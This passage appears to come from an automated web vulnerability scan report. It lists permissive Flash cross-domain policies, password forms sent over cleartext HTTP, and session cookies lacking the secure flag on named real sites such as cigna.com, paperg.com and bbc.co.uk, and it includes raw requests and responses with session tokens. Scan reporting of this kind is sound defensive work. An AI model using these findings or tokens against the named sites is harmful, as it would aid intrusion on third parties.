Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=114
Expires: Mon, 16 May 2011 14:52:32 GMT
Date: Mon, 16 May 2011 14:50:38 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.7. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 16 May 2011 14:52:37 GMT
Date: Mon, 16 May 2011 14:50:37 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

3.8. http://www.paperg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.paperg.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:36 GMT
Server: Apache
Last-Modified: Tue, 30 Mar 2010 22:02:28 GMT
ETag: "204-4830bc9102500"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 14:45:36 GMT
Content-Type: application/xml
Content-Length: 516
Connection: close
Via: 1.1 AN-0016020122637050

<?xml version="1.0"?>
<!-- http://www.paperg.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.paperg.com"/>
<allow-access-from domain="*.paperg.net"/>
<allow-access-from domain="*.bostonnow.com"/>
<allow-access-from domain="*.thecrimson.com"/>
<allow-access-from domain="*.thephoenix.com"/>
<allow-access-from domain="*.stuffatnight.com"/>
   <allow-access-from domain="*.weeklydig.com"/>
   <allow-access-from domain="*.newhavenindependent.com"/>
...[SNIP]...

3.9. http://www.regions.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R3380334504; path=/
Content-Length: 1000
Content-Type: text/xml
Last-Modified: Tue, 23 Feb 2010 15:52:47 GMT
Accept-Ranges: bytes
ETag: "3b38bf3ea0b4ca1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:50 GMT
Connection: keep-alive

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.luckie.net" />
<allow-access-from domain="luckie.net" />
<allow-access-from domain="media.pointroll.com"/>
<allow-access-from domain="www.pointroll.com"/>
<allow-access-from domain="submit.pointroll.com"/>
<allow-access-from domain="data.pointroll.com"/>
<allow-access-from domain="speed.pointroll.com"/>
<allow-access-from domain="mirror.pointroll.com"/>
<allow-access-from domain="mx.pointroll.com"/>
<allow-access-from domain="geo.pointroll.com"/>
<allow-access-from domain="ll.pointroll.com"/>
<allow-access-from domain="clk.pointroll.com"/>
<allow-access-from domain="clients.pointroll.com"/>
<allow-access-from domain="fdaf.pointroll.com"/>
<allow-access-from domain="demo.pointroll.net"/>
...[SNIP]...

3.10. https://www.regions.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R939930197; path=/
Content-Length: 1000
Content-Type: text/xml
Last-Modified: Tue, 23 Feb 2010 15:52:47 GMT
Accept-Ranges: bytes
ETag: "3b38bf3ea0b4ca1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:51 GMT
Connection: keep-alive

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.luckie.net" />
<allow-access-from domain="luckie.net" />
<allow-access-from domain="media.pointroll.com"/>
<allow-access-from domain="www.pointroll.com"/>
<allow-access-from domain="submit.pointroll.com"/>
<allow-access-from domain="data.pointroll.com"/>
<allow-access-from domain="speed.pointroll.com"/>
<allow-access-from domain="mirror.pointroll.com"/>
<allow-access-from domain="mx.pointroll.com"/>
<allow-access-from domain="geo.pointroll.com"/>
<allow-access-from domain="ll.pointroll.com"/>
<allow-access-from domain="clk.pointroll.com"/>
<allow-access-from domain="clients.pointroll.com"/>
<allow-access-from domain="fdaf.pointroll.com"/>
<allow-access-from domain="demo.pointroll.net"/>
...[SNIP]...

3.11. http://xsinternational.app6.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xsinternational.app6.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: xsinternational.app6.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 21:47:20 GMT
Accept-Ranges: bytes
ETag: "0e4f34a711c81:101a8"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 17:08:00 GMT
Connection: close
Set-Cookie: HUBSPOT39=252777644.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

4. Cleartext submission of password  previous  next
There are 9 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


4.1. http://cigna.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:29:10 GMT
Content-type: text/html
Cache-control: no-cache
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!--Note: formatting/beautifying this code seems to break something. Leave as-is. -->

<html>
<head>

...[SNIP]...
<table class="homeLogIn">
   <form name="frmLogin" id="frmLogin" method="post" action="" onSubmit="return submitLogin();">
   <input type="hidden" name="TARGET" value="">
...[SNIP]...
<td>
           <input type="password" maxLength="32" size="22" name="PASSWORD" style="width:125px; height:15px;" class="portal">
       </td>
...[SNIP]...

4.2. http://www.paperg.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 11476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

4.3. http://www.paperg.com/company.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /company.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /company.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmb=1.5.10.1305557438; __utmc=1; __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27786045.1907620487.1305558925.1305558925.1305558925.1; __utmb=27786045; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:38 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 11250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

4.4. http://www.paperg.com/contact.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /contact.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /contact.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 11383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

4.5. http://www.paperg.com/join.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /join.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /join.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/support.php
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:14:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 12598


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

4.6. http://www.paperg.com/press.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /press.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /press.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:20:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 13132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

4.7. http://www.paperg.com/publishers/flyerboard.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /publishers/flyerboard.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /publishers/flyerboard.php HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 14:45:35 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 14896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

4.8. http://www.paperg.com/publishers/placelocal.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /publishers/placelocal.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /publishers/placelocal.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 13131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

4.9. http://www.paperg.com/support.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /support.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /support.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 12289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

5. SSL cookie without secure flag set  previous  next
There are 92 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


5.1. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotId.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /corp/sso/ci/selfsvc/forgotId.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/ci/selfsvc/forgotId.do?user.portal=provider HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 302 Found
content-language: en-US
content-type: text/html
date: Mon, 16 May 2011 15:31:34 GMT
location: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayId.do
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 0
cache-control: no-cache,no-store,max-age=0
expires: Thu, 01 Jan 1970 00:00:00 GMT
pragma: No-cache
Set-Cookie: JSESSIONID=0000WJAfBu1bY2N8CqEkO0_cQjE:15eoj2vv7; Path=/
Set-Cookie: PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; Path=/
Content-Length: 0


5.2. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotPassword.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /corp/sso/ci/selfsvc/forgotPassword.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/ci/selfsvc/forgotPassword.do?user.portal=provider HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 302 Found
content-language: en-US
content-type: text/html
date: Mon, 16 May 2011 15:31:39 GMT
location: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayPasswordId.do
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 0
cache-control: no-cache,no-store,max-age=0
expires: Thu, 01 Jan 1970 00:00:00 GMT
pragma: No-cache
Set-Cookie: JSESSIONID=0000-q2wF_IgV38WKNH43KqfhRB:15eoj2var; Path=/
